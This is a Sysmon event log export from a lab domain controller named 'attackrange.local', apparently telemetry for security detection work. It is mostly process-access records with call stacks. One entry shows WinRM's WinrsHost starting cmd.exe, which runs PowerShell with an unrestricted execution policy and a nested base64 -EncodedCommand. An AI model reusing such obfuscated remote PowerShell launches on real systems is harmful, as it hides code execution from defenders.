10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002721Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002720Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002719Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002718Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E35-5F80-8100-000000007F01}2836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002717Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3E35-5F80-7F00-000000007F01}50643336C:\Windows\system32\WinrsHost.exe{733EE690-3E35-5F80-8100-000000007F01}2836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x80000000000000002716Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.196{733EE690-3E35-5F80-8100-000000007F01}2836C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E35-5F80-A1DB-040000000000}0x4dba10HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E35-5F80-7F00-000000007F01}5064C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002715Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002714Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002713Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002712Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.187{733EE690-3DF9-5F80-1500-000000007F01}13561984C:\Windows\system32\svchost.exe{733EE690-3E35-5F80-7F00-000000007F01}5064C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002711Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.172{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E35-5F80-7F00-000000007F01}5064C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002710Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.172{733EE690-3E35-5F80-8000-000000007F01}50765096C:\Windows\system32\conhost.exe{733EE690-3E35-5F80-7F00-000000007F01}5064C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002709Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E35-5F80-8000-000000007F01}5076C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002708Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002707Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002706Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002704Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002703Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002702Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 